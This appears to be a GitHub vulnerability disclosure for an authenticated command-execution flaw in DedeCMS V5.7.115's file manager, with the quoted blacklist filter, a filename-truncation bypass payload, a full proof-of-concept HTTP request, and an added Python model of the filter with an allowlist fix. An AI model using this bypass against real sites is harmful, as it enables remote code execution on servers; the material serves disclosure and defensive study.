Command Execution Vulnerability in DedeCMS V5.7.115 #1

Closed
iami233 opened this issue Jul 21, 2024 · 0 comments

Comments

iami233 (Owner) commented Jul 21, 2024

Vulnerability Description

DedeCMS is a PHP-based website content management system. DedeCMS V5.7.115 has a command execution vulnerability which attackers can exploit to execute malicious commands.

Vulnerability Impact

The official version of DedeCMS V5.7.115 (which is the latest version) can be downloaded from the official website: https://www.dedecms.com/download

Vulnerability Reproduction

After logging into the website backend, you can see the vulnerability point in the file manager under Modules -> Auxiliary Plugins in the left sidebar. Alternatively, you can directly access it via the following link:

http://<website_address>/dede/file_manage_view.php?fmdo=newfile&activepath=


When we change the file extension to .php, we can upload a custom PHP file. Through testing, we can see that certain functions are filtered; for example, the following content is rejected:

<?php phpinfo(); ?>


The filtering logic is located in the file dede/file_manage_control.php, lines 28-54:

$str = preg_replace("#(/\*)[\s\S]*(\*/)#i", '', $str);
global $cfg_disable_funs;
// space-separated blacklist; the "[$]..." entries are regex fragments matching superglobals
$cfg_disable_funs = isset($cfg_disable_funs) ? $cfg_disable_funs : 'phpinfo eval assert exec passthru shell_exec system proc_open popen curl_exec curl_multi_exec parse_ini_file show_source file_put_contents fsockopen fopen fwrite preg_replace';
$cfg_disable_funs = $cfg_disable_funs.' [$]GLOBALS [$]_GET [$]_POST [$]_REQUEST [$]_FILES [$]_COOKIE [$]_SERVER include require create_function array_map call_user_func call_user_func_array array_filter getallheaders';
foreach (explode(" ", $cfg_disable_funs) as $value) {
    $value = str_replace(" ", "", $value);
    // each entry is interpolated into the pattern unescaped and must be followed by ( [ { or '
    if (!empty($value) && preg_match("#[^a-z]+['\"]*{$value}['\"]*[\s]*[([{']#i", "{$str}") == TRUE) {
        $str = dede_htmlspecialchars($str);
        die("DedeCMS提示:当前页面中存在恶意代码!<pre>{$str}</pre>"); // "DedeCMS notice: malicious code exists in the current page!"
    }
}
// the checks below only run when at least one character precedes the <?php or <?= tag
if (preg_match("#^[\s\S]+<\?(php|=)?[\s]+#i", "{$str}") == TRUE) {
    // variable function call of the form $name(...);
    if (preg_match("#[$][_0-9a-z]+[\s]*[(][\s\S]*[)][\s]*[;]#iU", "{$str}") == TRUE) {
        $str = dede_htmlspecialchars($str);
        die("DedeCMS提示:当前页面中存在恶意代码!<pre>{$str}</pre>"); // "DedeCMS notice: malicious code exists in the current page!"
    }
    // error-suppressed variable function call @$name(...)
    if (preg_match("#[@][$][_0-9a-z]+[\s]*[(][\s\S]*[)]#iU", "{$str}") == TRUE) {
        $str = dede_htmlspecialchars($str);
        die("DedeCMS提示:当前页面中存在恶意代码!<pre>{$str}</pre>"); // "DedeCMS notice: malicious code exists in the current page!"
    }
    // backtick shell-execution operator
    if (preg_match("#[`][\s\S]*[`]#i", "{$str}") == TRUE) {
        $str = dede_htmlspecialchars($str);
        die("DedeCMS提示:当前页面中存在恶意代码!<pre>{$str}</pre>"); // "DedeCMS notice: malicious code exists in the current page!"
    }
}

We can bypass the filters by truncating the file name. For example, if we want to use the system function to execute commands, we change the file name to system.php with the following content:

<?php substr(__FILE__, -10, 6)('whoami'); ?>


POC

POST /dede/file_manage_control.php HTTP/1.1
Host: dedecms.la
Content-Length: 190
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://dedecms.la
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://dedecms.la/dede/file_manage_view.php?fmdo=newfile&activepath=
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=7atqchjja8g9a1b11sol8egogf; _csrf_name_5e980804=8af24700c5fdbad2259844278b86765f; _csrf_name_5e9808041BH21ANI1AGD297L1FF21LN02BGE1DNG=1a0f7176f0097d2d; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=6054ceafa2a9d5a2; DedeLoginTime=1723099351; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=8521e68d2dcc7cc9
Connection: close

fmdo=edit&backurl=&token=90990b401506a4b7a4cffb92ab66a740&activepath=&filename=system.php&str=%3C%3Fphp+substr%28__FILE__%2C+-10%2C+6%29%28%27whoami%27%29%3B+%3F%3E&B1=++%E4%BF%9D+%E5%AD%98++

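As an added example (not part of the original issue and not DedeCMS code), the following Python models the body blacklist from dede/file_manage_control.php, runs the blocked phpinfo body and the substr(__FILE__) bypass through it, resolves what the bypass actually calls once saved under the name system.php, and then shows an allowlist on the file name as the control a blacklist on the body cannot provide. The function names, the SAFE_EXTENSIONS allowlist, the sample path and the sample file bodies are assumptions constructed for this example.

```python
import re

# Added example: a Python model of the blacklist in dede/file_manage_control.php
# (DedeCMS V5.7.115), built to show why the bypass in the issue works and what
# an allowlist on the file name does instead. Function names, the allowlist and
# the sample inputs below are assumptions constructed for this example.

DISABLED_NAMES = (
    "phpinfo eval assert exec passthru shell_exec system proc_open popen "
    "curl_exec curl_multi_exec parse_ini_file show_source file_put_contents "
    "fsockopen fopen fwrite preg_replace "
    "[$]GLOBALS [$]_GET [$]_POST [$]_REQUEST [$]_FILES [$]_COOKIE [$]_SERVER "
    "include require create_function array_map call_user_func "
    "call_user_func_array array_filter getallheaders"
).split()

QUOTES = "['\"]*"


def dede_filter_rejects(src: str) -> bool:
    """Model of the DedeCMS body check: True means the save would be refused.

    PHP's U (ungreedy) modifier is dropped: it changes what a match spans,
    not whether preg_match / re.search finds one at all.
    """
    src = re.sub(r"(/\*)[\s\S]*(\*/)", "", src, flags=re.I)
    for name in DISABLED_NAMES:
        # each entry is spliced in unescaped, as PHP interpolates {$value},
        # so "[$]GLOBALS" is itself a regex fragment matching "$GLOBALS"
        if re.search("[^a-z]+" + QUOTES + name + QUOTES + r"\s*[(\[{']", src, re.I):
            return True
    # the variable-function checks are gated on at least one character
    # preceding the <?php / <?= tag (the leading [\s\S]+), so a body that
    # starts with the tag never reaches them
    if re.search(r"^[\s\S]+<\?(php|=)?\s+", src, re.I):
        if re.search(r"[$][_0-9a-z]+\s*[(][\s\S]*[)]\s*[;]", src, re.I):
            return True
        if re.search(r"[@][$][_0-9a-z]+\s*[(][\s\S]*[)]", src, re.I):
            return True
        if re.search(r"[`][\s\S]*[`]", src, re.I):
            return True
    return False


def php_substr(s: str, start: int, length: int) -> str:
    """PHP substr() semantics for the negative-start, positive-length case."""
    return s[start:][:length]


def resolve_callee(saved_path: str) -> str:
    """What substr(__FILE__, -10, 6) evaluates to once the file is saved."""
    return php_substr(saved_path, -10, 6)


# Assumption: a site-specific allowlist of extensions the manager may write.
SAFE_EXTENSIONS = frozenset({"htm", "html", "txt", "css", "js"})


def hardened_gate_rejects(filename: str, src: str) -> bool:
    """Allowlist the name first; the body blacklist is only a secondary signal."""
    base = filename.replace("\\", "/").rsplit("/", 1)[-1].lower()
    segments = base.split(".")
    if len(segments) < 2 or "" in segments:
        return True  # no extension, or a dotfile such as .htaccess
    # every segment after the base name must be allowlisted, so "shell.php.txt"
    # is refused along with "shell.php" and "shell.phtml"
    if any(seg not in SAFE_EXTENSIONS for seg in segments[1:]):
        return True
    return dede_filter_rejects(src)


# Constructed inputs: the body the issue shows being blocked, and the bypass.
BLOCKED_BODY = "<?php phpinfo(); ?>"
BYPASS_BODY = "<?php substr(__FILE__, -10, 6)('whoami'); ?>"

if __name__ == "__main__":
    print("phpinfo body rejected:", dede_filter_rejects(BLOCKED_BODY))
    print("bypass body rejected:", dede_filter_rejects(BYPASS_BODY))
    print("callee once saved:", resolve_callee("/var/www/html/dede/system.php"))
    print("allowlist rejects system.php:", hardened_gate_rejects("system.php", BYPASS_BODY))
```

The model reproduces the two observations in the issue: the phpinfo body is refused by the name blacklist, while the substr(__FILE__) body contains none of the listed names and is accepted. It also makes visible that the `$name(...)` patterns are reachable only when something precedes the opening tag, and that a `)(...)` call carries no `$` for them to match even then. The allowlist is the control that does not depend on guessing what the body will do: it refuses to write any name that a PHP handler could execute, whatever the content.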

@iami233 iami233 closed this as completed Aug 27, 2024
Repository owner locked as resolved and limited conversation to collaborators Aug 27, 2024